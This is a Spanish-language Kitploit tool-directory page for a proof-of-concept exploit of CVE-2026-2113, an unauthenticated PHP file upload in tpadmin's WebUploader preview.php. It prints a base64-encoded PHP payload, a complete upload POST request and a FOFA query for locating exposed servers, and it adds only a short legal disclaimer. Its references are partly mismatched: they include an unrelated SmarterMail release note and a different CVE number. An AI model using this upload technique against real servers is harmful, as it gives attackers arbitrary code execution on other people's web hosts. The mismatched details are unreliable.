Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
tpadmin-CVE-2026-2113-poc — Una vulnerabilidad de Ejecución Remota de Código que permite a atacantes no autenticados subir archivos PHP arbitrarios directamente al servidor web. Esto resulta en una Ejecución Remota de Código inmediata con privilegios del servidor web. | Kitploit
Herramientas/GitHubGitHub/maxmnml/tpadmin-cve-2026-2113-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmaxmnml/tpadmin-cve-2026-2113-poc

tpadmin-CVE-2026-2113-poc

Una vulnerabilidad de Ejecución Remota de Código que permite a atacantes no autenticados subir archivos PHP arbitrarios directamente al servidor web. Esto resulta en una Ejecución Remota de Código inmediata con privilegios del servidor web.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 7 mesesAún no revisado
Compartir

tpadmin-CVE-2026-2113-poc

Una prueba de concepto que explota la Ejecución Remota de Código con privilegios del servidor web mediante la Carga Arbitraria de Archivos.

Descripción de la vulnerabilidad

Existe una vulnerabilidad crítica de Ejecución Remota de Código en el componente de vista previa WebUploader del sistema H-ui.admin. El archivo <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> carece de autenticación y validación de archivos adecuadas, lo que permite a atacantes no autenticados cargar archivos PHP arbitrarios directamente en el servidor web. Esto resulta en una Ejecución Remota de Código inmediata con privilegios del servidor web.

Versiones afectadas

  • tpadmin hasta la versión 1.3.12

Poc (por sTy1H)

  1. Construye el payload (Codifica la declaración peligrosa en base64)
root@kitploit:~
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
  1. Construye la solicitud POST con nuestro payload
root@kitploit:~
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
  1. Visita la URL devuelta
imagen

En la naturaleza

FOFA:

root@kitploit:~
title='Tpadmin'

Impacto

Un atacante remoto no autenticado puede explotar una Carga Arbitraria de Archivos para obtener una RCE con privilegios del servidor web.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

Remediación y mitigación

No hay información conocida sobre posibles contramedidas. Se sugiere reemplazar el objeto afectado por un producto alternativo.

Referencias

  • https://github.com/yuan1994/tpAdmin
  • https://www.smartertools.com/smartermail/release-notes/current)
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.

Descargar herramienta